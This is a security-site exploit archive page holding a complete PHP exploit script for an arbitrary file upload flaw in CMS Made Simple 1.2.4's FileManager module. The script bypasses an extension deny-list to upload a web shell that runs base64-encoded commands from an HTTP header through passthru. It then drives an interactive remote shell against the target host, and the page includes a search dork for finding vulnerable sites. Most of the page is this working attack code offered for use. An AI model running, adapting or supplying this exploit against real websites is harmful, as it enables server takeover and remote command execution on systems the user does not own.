|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : ExploitAlert | ||
 ExploitAlert : 3901 Credit : EgiX Date : 13.5.2008 Exploit Code : <?php /* ----------------------------------------------------------------------- ---- CMS Made Simple <= 1.2.4 (FileManager module) Arbitrary File Upload Exploit ----------------------------------------------------------------------- ---- author...: EgiX mail.....: n0b0d13s[at]gmail[dot]com link.....: http://www.cmsmadesimple.org/ dork.....: "This site is powered by CMS Made Simple" [-] vulnerable code in /modules/FileManager/postlet/javaUpload.php 21. // Configuration --------------------------------------------------------------- 22. // Change the below path to the folder where you would like files uploading. 23. // e.g. "/home/yourname/myuploads/" 24. // or "c:\php\uploads\" 25. // Note, this MUST have the trailing slash. 26. $uploaddir = '[PATH TO UPLOAD DIRECTORY]'; 27. // Whether or not to allow the upload of specific files 28. $allow_or_deny = true; 29. // If the above is true, then this states whether the array of files is a list of 30. // extensions to ALLOW, or DENY 31. $allow_or_deny_method = "deny"; // "allow" or "deny" 32. $file_extension_list = array("php","asp","pl"); 33. // ------------------------------------------------------------------------ ----- 34. if ($allow_or_deny){ 35. if (($allow_or_deny_method == "allow" && !in_array(strtolower(array_pop(explode('.', $_FILES['userfile']['name']))), $file_extension_list)) 36. || ($allow_or_deny_method == "deny" && in_array(strtolower(array_pop(explode('.', $_FILES['userfile']['name']))), $file_extension_list))){ 37. // Atempt to upload a file with a specific extension when NOT allowed. 38. // 403 error 39. header("HTTP/1.1 403 Forbidden"); 40. echo "POSTLET REPLY\r\n"; 41. echo "POSTLET:NO\r\n"; 42. echo "POSTLET:FILE TYPE NOT ALLOWED\r\n"; 43. echo "POSTLET:ABORT THIS\r\n"; // Postlet should NOT send this file again. 44. echo "END POSTLET REPLY\r\n"; 45. exit; 46. } 47. } 48. if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir .$_FILES['userfile']['name'])) 49. { 50. // All replies MUST start with "POSTLET REPLY", if they don't, then Postlet will 51. // not read the reply and will assume the file uploaded successfully. 52. echo "POSTLET REPLY\r\n"; 53. // "YES" tells Postlet that this file was successfully uploaded. 54. echo "POSTLET:YES\r\n"; 55. // End the Postlet reply 56. echo "END POSTLET REPLY\r\n"; 57. exit; with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code due to $file_extension_list array don't contains many dangerous extensions (.jsp, .php3, .cgi, .dhtml, etc...) */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { $sock = fsockopen($host, 80); while (!$sock) { print "\n[-] No response from {$host}:80 Trying again..."; $sock = fsockopen($host, 80); } fputs($sock, $packet); while (!feof($sock)) $resp .= fread($sock, 1024); fclose($sock); return $resp; } function upload() { global $host, $path, $uploaddir, $file_ext; foreach ($file_ext as $ext) { print "\n[-] Trying to upload with .{$ext} extension..."; $data = "--12345\r\n"; $data .= "Content-Disposition: form-data; name=\"userfile\"; filename=\".php.{$ext}\"\r\n"; $data .= "Content-Type: application/octet-stream\r\n\r\n"; $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${pr int(_code_)} ?>\n"; $data .= "--12345--\r\n"; $packet = "POST {$path}modules/FileManager/postlet/javaUpload.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($data)."\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=12345\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $data; $html = http_send($host, $packet); if (!eregi("POSTLET:YES", $html)) die("\n[-] Upload failed!\n"); $packet = "GET {$path}modules/FileManager/postlet/{$uploaddir}.php.{$ext} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; $html = http_send($host, $packet); if (!eregi("print", $html) and eregi("_code_", $html)) return $ext; sleep(1); } return false; } "\n+----------------------------------------------------------------+"; print "\n| CMS Made Simple <= 1.2.4 Arbitrary File Upload Exploit by EgiX |"; "\n+----------------------------------------------------------------+\n" ; if ($argc < 2) { print "\nUsage......: php $argv[0] host path"; print "\nExample....: php $argv[0] localhost /cms/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $uploaddir = rawurlencode("[PATH TO UPLOAD DIRECTORY]"); $file_ext = array("dhtml", "phtml", "php3", "php5", "jsp", "jar", "cgi"); if (!($ext = upload())) die("\n\n[-] Exploit failed...\n"); else print "\n[-] Shell uploaded...starting it!\n"; define(STDIN, fopen("php://stdin", "r")); while(1) { print "\ncmsmadesimple-shell# "; $cmd = trim(fgets(STDIN)); if ($cmd != "exit") { $packet = "GET {$path}modules/FileManager/postlet/{$uploaddir}.php.{$ext} HTTP/1.0\r\n"; $packet.= "Host: {$host}\r\n"; $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; $packet.= "Connection: close\r\n\r\n"; $html = http_send($host, $packet); //echo $html; if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n"); $shell = explode("_code_", $html); print "\n{$shell[1]}"; } else break; } ?> |
||
| Alert | ||
*BSD libc (strfmon) Multiple vulnerabilities
Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems. |
||
| Apache |  |
|
» Apache (mod_status) |
||
» Apache (mod_proxy_ftp) |
||
| PHP | |
|
» PHP 5.2.5 and prior : |
||
- 2008-03-25| Copyright © SecurityReason. All Rights Reserved. |